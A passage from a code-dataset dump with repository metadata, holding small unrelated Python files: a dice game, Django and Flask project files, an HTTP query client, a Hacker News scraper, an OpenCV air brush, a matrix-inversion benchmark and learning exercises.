self.dice = Die.create_dice(5) # moved it here from __init__ to run it every turn
print("\nRound {}\n".format(runner.round)) # added line
for die in runner.dice:
print(die.show())
guess = '' # rewrote some lines to catch errors
while type(guess) != int:
guess = input("Sigh. What is your guess?: ")
try:
guess = int(guess)
except ValueError:
                    print('Not a number. Try again!')
if guess == runner.answer():
print("Congrats, you can add like a 5 year old...")
runner.wins += 1
guessCount += 1
else:
print("Sorry that's wrong")
print("The answer is: {}".format(runner.answer()))
print("Like seriously, how could you mess that up")
runner.loses += 1
guessCount += 1 # (c or ) guessCount should be incremented
print("Wins: {} Loses {}".format(runner.wins, runner.loses))
runner.round += 1
if guessCount == 6:
print() # added line
if runner.wins > runner.loses: print("You won... Congrats...") # conditional ending
else: print("You did not win....") # conditional ending
print() # added line
prompt = input("Would you like to play again?[y/n]: ") # now asking after all rounds
if prompt == 'y' or prompt == 'Y': # replaced "" with "Y"
print()
runner.reset() # resetting
guessCount = 0 # resetting
continue
else:
break # strange ending changed to break
| [
"[email protected]"
]
| |
38af0a8f4ec7b286afc5854b6b8d7664edf331e0 | f4df9e53f984f293786fa3b890ab15f8c20abefd | /Django/beltreview/beltreview/urls.py | 7767d39b40ce4346388762908fc3bc5c218872b4 | []
| no_license | Chiefautoparts/Python_Party | bd0fbac9ea003f92be0f97d6f1d8f8d51c98a1b8 | 3d81052c51f14d5fc5dbd25317d23b891e766d8e | refs/heads/master | 2021-01-25T07:55:05.218262 | 2017-06-30T04:44:18 | 2017-06-30T04:44:18 | 93,680,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | """beltreview URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
]
| [
"[email protected]"
]
| |
fbb4019fa4789ab13854b2af3d2fa7780bbb329c | dd57fad95738d367c061d7881f8ab0d8dd60583c | /manage.py | 5061e823075a792df7c5af5d2cbd1860b72fc163 | [
"MIT"
]
| permissive | Zhaoyanzhang/-myflasky | e590f3d1f3af67d6bba7de4912b33c26e95cd9c1 | bfbd101574953762cb3d36de03e70868317eee1d | refs/heads/master | 2021-01-19T13:38:58.082291 | 2017-11-28T15:12:29 | 2017-11-28T15:12:29 | 100,850,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 827 | py | #!/usr/bin/env python
import os
from app import create_app, db
from app.models import User, Role,Post,Follow,Permission,Comment
from flask_script import Manager, Shell
from flask_migrate import Migrate, MigrateCommand
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
manager = Manager(app)
migrate = Migrate(app, db)
def make_shell_context():
return dict(app=app, db=db, User=User, Role=Role,Post=Post,\
Permission=Permission,Follow=Follow,Comment=Comment)
manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
@manager.command
def test():
"""Run the unit tests."""
import unittest
tests = unittest.TestLoader().discover('tests')
unittest.TextTestRunner(verbosity=2).run(tests)
if __name__ == '__main__':
manager.run()
| [
"[email protected]"
]
| |
03806ebeea1b9df25cd60918f7afec18ceff218d | d83d4914df570d6e22a5f6ff94d8fb8870f50d17 | /tests/query.py | f7ce98f11f1328cd3d46bcf71bbbf3db692b64d2 | []
| no_license | upton/amondawa | 73d6ea749fe1955559c0db5b32d497b54f4c88aa | 3fe3d4f5cb9312b3a8e113bd5b856d58dbc0ec0a | refs/heads/master | 2021-01-21T01:06:35.836652 | 2014-02-06T06:04:05 | 2014-02-06T06:04:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,220 | py | # Copyright (c) 2013 Daniel Gardner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from amondawa.auth import auth_add_auth1
import simplejson, httplib
from threading import Thread
class QueryRunner(Thread):
PATH = '/api/v1/nodomain/datapoints/query'
def __init__(self, host, port, access_key_id, secret_access_key):
super(QueryRunner, self).__init__()
self.access_key_id = access_key_id
self.secret_access_key = secret_access_key
self.host = host
self.port = port
self._connect()
def perform_query(self, query):
return self._perform_query(simplejson.dumps(query))
def _perform_query(self, query):
try:
headers = auth_add_auth1(self.access_key_id, self.secret_access_key,
'POST', self.host, self.port, QueryRunner.PATH, {'Content-Type': 'application/json'})
self.connection.request('POST', QueryRunner.PATH, query, headers)
return self.connection.getresponse()
except:
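            # assume the connection went stale: reopen it and retry the request once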
self._connect()
self.connection.request('POST', QueryRunner.PATH, query, headers)
return self.connection.getresponse()
def _connect(self):
self.connection = httplib.HTTPConnection(self.host, self.port)
def run(self):
pass
| [
"[email protected]"
]
| |
410f5cd2e5627cc13742a86d900883f68c5f4db4 | d0d023eab4b597460403f6378dbe3f4c0e35f106 | /break循环.py | 3e9f7a168c386b19c304d0cb3d89d2829d86dad0 | []
| no_license | UUtest/learnstone | ad99eb59785c670fb9d054a628b0f752b3b74914 | 17104b31aaf2b078bf2d002e6cb65d9ad3fe177e | refs/heads/master | 2021-01-19T10:57:14.897766 | 2018-06-25T11:33:10 | 2018-06-25T11:33:10 | 87,921,652 | 0 | 0 | null | 2017-04-16T14:14:07 | 2017-04-11T10:33:08 | null | UTF-8 | Python | false | false | 88 | py | n = 1
while n <= 100:
if n>10:
break
print(n)
n = n +1
print('END')
| [
"[email protected]"
]
| |
f1ae87159224252ac7dcbb0ad74eeb40808963a0 | 65ca44041d7925372120cdbcb8e08fa7c507c035 | /example/full/forward.py | e8b84cb61724f820ba54468d11347fd7c35a7e1f | [
"MIT"
]
| permissive | lujung/python-spresso | faef8d092f2bde56ed318d52770d8cf38762ad2d | 32e0229abe9e18bbbe487184645d66ed1ed95a05 | refs/heads/master | 2021-01-21T06:30:45.630091 | 2017-03-01T20:01:26 | 2017-03-01T20:01:26 | 83,245,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | import logging
from wsgiref.simple_server import make_server
from spresso.controller.application import Application
from spresso.controller.grant.authentication.core import \
ForwardAuthenticationGrant
from spresso.controller.grant.authentication.config.forward import \
Forward
from spresso.controller.web.wsgi import WsgiApplication
logging.basicConfig(level=logging.DEBUG)
# Create config
settings = Forward()
settings.scheme = "http"
# Create the controller
application = Application()
application.add_grant(ForwardAuthenticationGrant(settings=settings))
# Wrap the controller with the WSGI adapter
app = WsgiApplication(application)
if __name__ == "__main__":
httpd = make_server('', 8081, app)
httpd.serve_forever()
| [
"[email protected]"
]
| |
2ccf6e8187ca4ba55a24f1a28a9bc20379fa6251 | 397b0edb50c3838b6ee48822a1d2d0fcb645c1e2 | /utils/rehelper.py | 6626e15faaa0ebb8994c94bf3eb67cfdd62a9771 | []
| no_license | RonDen/spider-snippet | b3b935ca6e408abff1356b04dc75c4542b025c79 | 8d4b5bc2fea89fe3f595a5453c4abdb9b5ce44b8 | refs/heads/main | 2023-04-10T19:50:17.946004 | 2021-04-27T13:51:36 | 2021-04-27T13:51:36 | 362,125,388 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | import re
_pattern = re.compile(r'\d+')
def reg_int(s: str):
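    # assumes s contains at least one digit run; otherwise search() returns
    # None and the .group() call below raises AttributeError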
res = _pattern.search(s)
return int(res.group(0))
| [
"[email protected]"
]
| |
4ea466b0e7f19e3d00272633e1cbbf7a91c65dba | 695182479b8dd493e038ac704caf0d440fab007c | /module_fundamental/m004_type_data_string.py | 833d41a62968bf795ee86dc13d8b618aae44a3dd | []
| no_license | algokelvin-373/PythonFundamental | 61dd395f7300d5d7e2f9f3963e3ac2c563e6e003 | eb2b29be75f69146addb952feb8b537099c1e09f | refs/heads/master | 2023-06-17T02:38:29.114093 | 2021-06-19T15:08:36 | 2021-06-19T15:08:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 455 | py | print("Basic Type Data -> String")
a = "Hello, I am Kelvin. I'm ready to learn Python Programming"
print("Value a = ", a, ", type = ", type(a)) # 'str' is String
# String version 1
b = "Hello, I am Kelvin. " \
"I'm ready to learn Python " \
"Programming"
print("Value b = ", b, ", type = ", type(b))
# String version 2
c = '''\nHello, I am Kelvin.
I'm ready to learn Python
Programming'''
print("Value c = ", c, ", type = ", type(c))
| [
"[email protected]"
]
| |
52b36ccf3da23038a20396094e5100821ad733d3 | 825c1e78ec108bbec59cba3cfc6e0e2bf4a92ca8 | /hello-world/hello_world.py | 73acacf6bb2ee2b0166e64c4a7bdbfd9cdd90a4c | [
"Unlicense"
]
| permissive | pierrebeaucamp/Exercism-Python | 52984866b9e552bc801da8ff7c77584bd28c1b4b | 910b764c6726e9f131fb3a394c70d9b5bb167be9 | refs/heads/master | 2021-01-10T06:16:18.262702 | 2016-01-11T02:00:08 | 2016-01-11T02:00:08 | 46,693,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 80 | py | def hello(name=''):
return "Hello, %s!" % (name if name != '' else "World")
| [
"[email protected]"
]
| |
b50ab0437bdeb0851adabcf7abdab17632f1e3ef | 82b495a208ebdeb71314961021fbfe767de57820 | /chapter-06/temperature.py | 6c3619f4fe12c91df242c2a86240bd498aa1abd1 | [
"MIT"
]
| permissive | krastin/pp-cs3.0 | 7c860794332e598aa74278972d5daa16853094f6 | 502be9aac2d84215db176864e443c219e5e26591 | refs/heads/master | 2020-05-28T02:23:58.131428 | 2019-11-13T13:06:08 | 2019-11-13T13:06:08 | 188,853,205 | 0 | 0 | MIT | 2019-11-13T13:06:09 | 2019-05-27T13:56:41 | Python | UTF-8 | Python | false | false | 469 | py | def convert_to_celsius(fahrenheit: float) -> float:
"""Return the number of Celsius degrees equivalent to fahrenheit
degrees.
>>> convert_to_celsius(75)
23.88888888888889
"""
return (fahrenheit - 32.0) * 5.0 / 9.0
def above_freezing(celsius: float) -> bool:
"""Return true if the temperature in celsius degrees is above freezing
>>> above_freezing(5.2)
True
>>> above_freezing(-2)
False
"""
return celsius > 0
| [
"[email protected]"
]
| |
60ac5b982c6ac4f885ed6ab7e93cac1fc67dca17 | f0b03d244e9183e84d93330ae9fa9670d8177424 | /simple_posts_posts/models.py | bd3fda25076257523a4565caea220ca2a055bc71 | []
| no_license | humble9706/facebook | 6ad73e5bacd4bf9e891247ecebdd0dbfbca6277a | 65ef792e70d63c69ccde30656250c5f886ff3e1e | refs/heads/master | 2020-04-19T01:53:29.455771 | 2019-01-28T02:58:47 | 2019-01-28T02:58:47 | 167,885,058 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,709 | py | from django.db import models
from django.conf import settings
from django.utils.text import slugify
from django.urls import reverse
class Post(models.Model):
author = models.ForeignKey(
settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='posts')
date = models.DateTimeField(auto_now_add=True)
status = models.BooleanField(default=True)
image = models.ImageField(upload_to='Images')
title = models.CharField(max_length=100)
body = models.TextField(blank=True)
slug = models.SlugField(max_length=100)
likes = models.ManyToManyField(
settings.AUTH_USER_MODEL, related_name='liked', blank=True)
total_likes = models.PositiveIntegerField(db_index=True, default=0)#for purposes of denormalisation.
class Meta:
ordering = ('-total_likes', 'date')
def __str__(self):
return self.title
    # Override save() to set the slug automatically from the title.
def save(self, *args, **kwargs):
if not self.slug:
self.slug = slugify(self.title)
super(Post, self).save(*args, **kwargs)
def get_absolute_url(self):
return reverse('posts:post_detail', args=[self.date.year, self.date.month, self.date.day, self.slug, self.id])
class Comment(models.Model):
post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name='comments')
writer = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='comment', blank=True, null=True)
date = models.DateTimeField(auto_now_add=True)
body = models.TextField()
status = models.BooleanField(default=True)
def __str__(self):
return '{} commented on {}'.format(self.writer, self.post) | [
"[email protected]"
]
| |
d6ee5dc1abe1d518d68ca2e2446b88515339d72a | 92cec18f145b71403d4c5511084a0da5fdeca9fb | /tests/test_bem_filesystem.py | 14ce83ae0635b4f6c0f08f8a41a49b1b55f6bac2 | []
| no_license | Zed-chi/bem_fs | 12b320861c5984df0a222a6f4548f30a3de2a78d | a013e4d31eddd343d35a5edb3f99ef36535c73d4 | refs/heads/master | 2022-11-06T17:16:05.292183 | 2020-06-30T05:22:42 | 2020-06-30T05:22:42 | 275,676,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | from bem_filesystem import __version__
def test_version():
assert __version__ == "0.1.0"
| [
"[email protected]"
]
| |
3e71b79db3247270ca6a277a25362246fb8b342c | d43272ae0c112f84041d22e1012e4d31a869fbf3 | /news/models.py | c6d89836c3f2d9463a175f2656a94faae77aeb41 | []
| no_license | abhishek1404/my-first-blog | 82309c26d42d0684ed03e7c1aeca13b13e3b13e5 | 5b1a8f2daeb58e38585198b7eed9ae5bb6dba894 | refs/heads/master | 2021-01-10T14:49:49.525900 | 2016-02-21T08:37:47 | 2016-02-21T08:37:47 | 43,903,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 648 | py | from django.db import models
from django.utils import timezone
# Create your models here.
class Post(models.Model):
"an Article pusted on by any user"
title = models.TextField(blank=True)
author = models.TextField(blank=True)
created = models.DateTimeField(auto_now_add=True)
    tags = models.ManyToManyField('Tag', related_name='tag_posts', blank=True)
content = models.TextField(blank=True)
def __str__(self):
return self.title
class Tag(models.Model):
"""
Defines a keyword categorisation for posts
"""
name = models.CharField(max_length=50)
    def __str__(self):
        return self.name
| [
"[email protected]"
]
| |
a12343947c99a0584b18996596487918113884d1 | 255e19ddc1bcde0d3d4fe70e01cec9bb724979c9 | /all-gists/1360455/snippet.py | ff62eb5f770ed285b9b8fdc6e6f331c6b6e4e651 | [
"MIT"
]
| permissive | gistable/gistable | 26c1e909928ec463026811f69b61619b62f14721 | 665d39a2bd82543d5196555f0801ef8fd4a3ee48 | refs/heads/master | 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 | Python | UTF-8 | Python | false | false | 3,727 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Done under Visual Studio 2010 using the excelent Python Tools for Visual Studio
# http://pytools.codeplex.com/
#
# Article on ideas vs execution at: http://blog.databigbang.com/ideas-and-execution-magic-chart/
import urllib2
import json
from datetime import datetime
from time import mktime
import csv
import codecs
import cStringIO
class CSVUnicodeWriter: # http://docs.python.org/library/csv.html
"""
A CSV writer which will write rows to CSV file "f",
which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding="utf-8", **kwds):
# Redirect output to a queue
self.queue = cStringIO.StringIO()
self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
def writerow(self, row):
self.writer.writerow([s.encode("utf-8") for s in row])
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode("utf-8")
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
self.queue.truncate(0)
def writerows(self, rows):
for row in rows:
self.writerow(row)
def get_hackernews_articles_with_idea_in_the_title():
endpoint = 'http://api.thriftdb.com/api.hnsearch.com/items/_search?filter[fields][title]=idea&start={0}&limit={1}&sortby=map(ms(create_ts),{2},{3},4294967295000)%20asc'
incomplete_iso_8601_format = '%Y-%m-%dT%H:%M:%SZ'
items = {}
start = 0
limit = 100
begin_range = 0
end_range = 0
url = endpoint.format(start, limit, begin_range, str(int(end_range)))
response = urllib2.urlopen(url).read()
data = json.loads(response)
prev_timestamp = datetime.fromtimestamp(0)
results = data['results']
while results:
for e in data['results']:
_id = e['item']['id']
title = e['item']['title']
points = e['item']['points']
num_comments = e['item']['num_comments']
timestamp = datetime.strptime(e['item']['create_ts'], incomplete_iso_8601_format)
            #if timestamp < prev_timestamp: # The results are not correctly sorted. We can't rely on this one.
            if _id in items: # If the circle is complete.
                return items
            prev_timestamp = timestamp
            items[_id] = {'id':_id, 'title':title, 'points':points, 'num_comments':num_comments, 'timestamp':timestamp}
            title_utf8 = title.encode('utf-8')
            print title_utf8, timestamp, _id, points, num_comments
        start += len(results)
        if start + limit > 1000:
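            # the search API rejects offsets past 1000, so restart paging with
            # the time window capped at the last timestamp seen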
start = 0
end_range = mktime(timestamp.timetuple())*1000
url = endpoint.format(start, limit, begin_range, str(int(end_range))) # if not str(int(x)) then a float gives in the sci math form: '1.24267528e+12'
response = urllib2.urlopen(url).read()
data = json.loads(response)
results = data['results']
return items
if __name__ == '__main__':
items = get_hackernews_articles_with_idea_in_the_title()
with open('hn-articles.csv', 'wb') as f:
hn_articles = CSVUnicodeWriter(f)
hn_articles.writerow(['ID', 'Timestamp', 'Title', 'Points', '# Comments'])
for k,e in items.items():
hn_articles.writerow([str(e['id']), str(e['timestamp']), e['title'], str(e['points']), str(e['num_comments'])])
# It returns 3706 articles where the query says that they are 3711... find the bug... | [
"[email protected]"
]
| |
41a05bf8566a0aaa78cd2a68971c5772b4e0c361 | 71fdffc6f4ed975d042073691960e554a2b76be0 | /Air Brush.py | 70ba0981586c27589e54a2deafc7f5fdb5bf4eca | []
| no_license | BhavyaShah1234/MyWholeImageProcessingFolder | 1abe4f1f35625daf5b0e532c4e285267cf90719e | fa8af03537c576c1c3661eb57a7346ab0db24f56 | refs/heads/main | 2023-04-05T00:25:24.932163 | 2021-04-08T07:04:04 | 2021-04-08T07:04:04 | 355,788,297 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,121 | py | import cv2
import numpy as np
frame_width = 800
frame_height = 600
brightness = 150
web_cam = cv2.VideoCapture(0)
web_cam.set(3, frame_width)
web_cam.set(4, frame_height)
web_cam.set(10, brightness)
my_colors = [[5, 107, 0, 19, 255, 255],
[133, 56, 0, 159, 156, 255],
[57, 76, 0, 100, 255, 255],
[90, 48, 0, 118, 255, 255]]
my_color_values = [[51, 153, 255],
[255, 0, 255],
[0, 255, 0],
[255, 0, 0]]
my_points = []
def find_color(img, colors, color_value):
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
count = 0
new_point = []
for k in colors:
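        # k[0:3] and k[3:6] hold the lower and upper HSV bounds for one colour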
lower = np.array(k[0:3])
upper = np.array(k[3:6])
mask = cv2.inRange(img_hsv, lower, upper)
x, y = get_contours(mask)
cv2.circle(image_result, (x, y), 10, color_value[count], cv2.FILLED)
if x != 0 and y != 0:
new_point.append([x, y, count])
count = count + 1
cv2.imshow(f'{k[0]}', mask)
return new_point
def get_contours(img):
contours, hierarchy = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
x = 0
y = 0
w = 0
for j in contours:
area = cv2.contourArea(j)
if area > 500:
cv2.drawContours(image_result, j, -1, (0, 255, 0), 4)
perimeter = cv2.arcLength(j, True)
approx = cv2.approxPolyDP(j, 0.02 * perimeter, True)
x, y, w, h = cv2.boundingRect(approx)
return x+w//2, y
def draw(points, color_values):
for point in points:
cv2.circle(image_result, (point[0], point[1]), 10, color_values[point[2]], cv2.FILLED)
while True:
success, image = web_cam.read()
image_result = image.copy()
new_points = find_color(image, my_colors, my_color_values)
for i in new_points:
if len(new_points) != 0:
my_points.append(i)
if len(my_points) != 0:
draw(my_points, my_color_values)
cv2.imshow('Air Brush', image_result)
cv2.waitKey(1)
| [
"[email protected]"
]
| |
3c095e405dc9ba2dd6771525f204117aed97ec9e | 01d2b2d99391c07c9e0bb3e2ce86db436c79f31b | /sgav/cars/forms.py | 133a63b1c44a702e9b1b75f37e60185849aa2ae4 | []
| no_license | daynaoliveira/sgav | 40b17b63fb58ac50f6aeed05de6ea75b0726caa0 | c4eae79cbe57737196d1af8197e878594655a797 | refs/heads/main | 2023-08-11T18:04:32.397912 | 2021-09-23T13:51:02 | 2021-09-23T13:51:02 | 358,619,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 244 | py | from django import forms
from django.db import models
from django.db.models import fields
from .models import Car
class CarForm(forms.ModelForm):
class Meta:
model = Car
fields = ('marca', 'modelo', 'placa', 'ano', 'cor')
| [
"[email protected]"
]
| |
d523298006de9cd021dfd6518d5dd86da298417b | 0ec88af9399ca8312cb408cb9b0344dd1c2fecee | /Program.py | 1538fea83915ee30f36b5d4e21e1aa2fe799dcb5 | []
| no_license | griselda-c/simulador-so-unqui | fad43e67b27897c6b65751b2654e4b5fe635ba79 | 970ab15a66e577d3ad304fcb89d4a79641653c3c | refs/heads/master | 2020-05-20T03:07:15.701394 | 2013-12-15T18:09:21 | 2013-12-15T18:09:21 | 32,224,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py |
class Program:
def __init__(self, nombre):
self.instrucciones = []
self.nombre = nombre
def addInstruction(self, instruccion):
self.instrucciones.append(instruccion)
def getCantInst(self):
return len(self.instrucciones) | [
"[email protected]@b104a250-5576-1979-6155-f292f37a00f3"
]
| [email protected]@b104a250-5576-1979-6155-f292f37a00f3 |
25ddfc25649e4f32fa7aca616751c0df603fbaa6 | d0705ffafbb53129bce83520e4a07362e1be8ff5 | /Auswertungskript.py | 0124a46447ab11271a7b82487a3337b99e0c2e8e | []
| no_license | rasefix/Semi-Stuff | 9d97bdb02bf052dc3fe210042e0cca1bad175fcf | f65556860971a90b8f8d4627fbea18fb057a14c5 | refs/heads/main | 2023-03-23T07:13:57.807010 | 2021-03-16T14:33:33 | 2021-03-16T14:33:33 | 348,387,474 | 0 | 0 | null | 2021-03-16T14:54:37 | 2021-03-16T14:54:35 | null | UTF-8 | Python | false | false | 489 | py | import openpyxl
a=0
b=2
while a==0:
temp=int(input("Temperatur:"))
konz=int(input("Konzentration:"))
if konz==5:
a=1
print("Messvorgang abgeschlossen")
else:
fileXLSX = openpyxl.load_workbook("Auswertung.xlsx")
sheet = fileXLSX["Tabelle1"]
sheet.cell(row=b, column=1).value = temp/1000
sheet.cell(row=b, column=2).value = konz/1000
fileXLSX.save('Auswertung.xlsx')
b=b+1
| [
"[email protected]"
]
| |
65db9b7872898345eee84550ab79aa3f9bbe16ab | 6ed034d0a5e239d7b0c528b287451409ffb4a494 | /mmpose/datasets/samplers/__init__.py | da09effaf20fefe1a102277672b98db7d884f002 | [
"Apache-2.0"
]
| permissive | ViTAE-Transformer/ViTPose | 8f9462bd5bc2fb3e66de31ca1d03e5a9135cb2bf | d5216452796c90c6bc29f5c5ec0bdba94366768a | refs/heads/main | 2023-05-23T16:32:22.359076 | 2023-03-01T06:42:22 | 2023-03-01T06:42:22 | 485,999,907 | 869 | 132 | Apache-2.0 | 2023-03-01T06:42:24 | 2022-04-27T01:09:19 | Python | UTF-8 | Python | false | false | 134 | py | # Copyright (c) OpenMMLab. All rights reserved.
from .distributed_sampler import DistributedSampler
__all__ = ['DistributedSampler']
| [
"[email protected]"
]
| |
90a7d506005f37668732ce2fbb68a6b27cd2b486 | f2e02a00604fcb52b7992535ad4e87f5368cb4a7 | /Entrega 6/INV_LLENAS.py | 5819f2385238e7dbbc66f1949998e6c7aef89e39 | []
| no_license | RobertoVergaraC/MCOC2021-P0 | 10cfdd36d703fe15d7ff765fdd1a44d379f4303a | c382cf2c158d5eb62a20708c58e1acdff3be1820 | refs/heads/main | 2023-07-14T20:38:47.824249 | 2021-09-02T23:24:05 | 2021-09-02T23:24:05 | 392,005,950 | 0 | 0 | null | 2021-08-02T15:43:35 | 2021-08-02T15:43:34 | null | UTF-8 | Python | false | false | 1,467 | py | from time import perf_counter
from numpy import zeros, logspace
from numpy import half, single, double, longdouble
from scipy.linalg import inv
def laplaciana(N, dtype):
A = zeros((N,N), dtype = dtype)
for i in range(N):
A[i,i] = 2
for j in range(max(0,i-2),i):
if abs(i - j) == 1:
A[i,j] = -1
A[j,i] = -1
return A
#Tamaño de N (finalmente serán 45 valores)
Nfake = logspace(0, 4, 50).tolist()
Nfake = [int(x) for x in Nfake]
Ns = []
for i in Nfake:
if i not in Ns:
Ns.append(i)
Ns.sort()
#Ns = [1, 10, 100, 1000]
#ESCOGEMOS EL MEJOR CASO DE INV
#CASO 3 INV LLENAS
#Creamos el documento .txt, en donde por línea habrán 3 listas [N, dt, mem]
fid = open("rendimiento_inv_llenas_caso_3.txt","w")
print("CASO 3 LLENAS INV")
for i in range(10):
print(f"Iteración {i+1}")
#Creamos listas vacías donde guardaremos la información
dts_ens = []
dts_sol = []
for N in Ns:
t1 = perf_counter()
#Creamos matrices
A = laplaciana(N, double)
#Medimos tiempo antes y después de inv de A
t2 = perf_counter()
Am1 = inv(A, overwrite_a=True)
t3 = perf_counter()
#Calculamos tiempo ensamblaje
dt_e = t2 - t1
#Calculamos tiempo solución
dt_s = t3 - t2
#Agregamos la información a cada lista
dts_ens.append(dt_e)
dts_sol.append(dt_s)
fid.write(f"{[Ns, dts_ens, dts_sol]}\n") #fid es así: [[Ns1],[dts_ens1],[dts_sol1]] \n [[Ns2],[dts_ens2],[dts_sol2]] \n ....
fid.close()
print("READY CASO 3 LLENAS INV") | [
"[email protected]"
]
| |
90e3d98c642160749d50467ed3d5a92d56c97b3c | 461a9e33aa76cd6f82f7e5ff23a1fafdc9d76e68 | /apps/departamentos/models.py | e2db1ee50345f31cf5aff78650fd3680a27c2844 | []
| no_license | alex7alves/Gestao_rh | 9bea77a62ca22701555465dd291ee8322da95e16 | 83d7f65cdf1a253cc59e24306874a0d0139ef2ca | refs/heads/master | 2020-08-02T13:52:28.041087 | 2019-10-10T18:37:39 | 2019-10-10T18:37:39 | 211,376,157 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 195 | py | from django.db import models
class Departamento(models.Model):
nome = models.CharField(max_length=200, help_text='Nome do departamento')
def __str__(self):
return self.nome
| [
"[email protected]"
]
| |
2fa3661ab59e5734ac5281fdfa08bbe6a00af969 | 91a65c33d13725771923de5cb54a70d10fe41733 | /companies/migrations/0005_permission_permission_role.py | 39c1b9385b8db1d7df3fc6f00765a6274bc9c7d5 | []
| no_license | georgid/Curation_Users | abdd87185a01f70b0c398cffa6aabbf05f4dc2fb | 847d4c7994cef02e0db6e7690fcb022ed0d64dff | refs/heads/master | 2022-05-18T01:31:55.049727 | 2019-06-14T13:25:09 | 2019-06-14T13:25:09 | 191,642,065 | 0 | 0 | null | 2022-04-22T21:32:37 | 2019-06-12T20:45:57 | Python | UTF-8 | Python | false | false | 1,316 | py | # Generated by Django 2.2.2 on 2019-06-12 16:11
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('companies', '0004_user_company_role'),
]
operations = [
migrations.CreateModel(
name='Permission',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('code', models.IntegerField()),
('Type', models.IntegerField()),
],
),
migrations.CreateModel(
name='Permission_Role',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('has_perm', models.BooleanField()),
('error_id', models.IntegerField()),
('permission', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='permission', to='companies.Permission')),
('role', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='role_id', to='companies.Role')),
],
),
]
| [
"[email protected]"
]
| |
743de3c696a558a9760587dc5f60b5a9a95f1bec | f5c4c04eb97875edea44ad3fa2fa07dcd40b031b | /tic-tac-toe/TicTacBoard.py | 426ef67c996a3cd66218dea548e62dda50f6297e | [
"MIT"
]
| permissive | gurjaspalbedi/reinforcement-learning | 62a4ce688e12a514cfe2b4790343bafd3c21502b | fcdd2b27500012f62cd0199614cfe71d2669e350 | refs/heads/master | 2020-04-17T19:46:17.875657 | 2019-02-19T02:07:21 | 2019-02-19T02:07:21 | 166,877,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py | import numpy as np
class TicTacBoard:
def __init__(self, board_size: int):
"""Initializing the board with size of the board
Parameters
----------
board_size : int
Size of the board
"""
self.board_size = board_size
def print_board(self, numerical_board):
"""Function that prints the board
Parameters
----------
numerical_board : List1D
The board that we want to print
"""
board = numerical_board.reshape(self.board_size, self.board_size)
for i in range(self.board_size):
for j in range(self.board_size):
print('1', end=" " ) if board[i][j] == 1 else (print ("2" , end=" ") if board[i][j] == 2 else print("O", end=" " ))
print("\n")
print("_____________________________________________________")
| [
"[email protected]"
]
| |
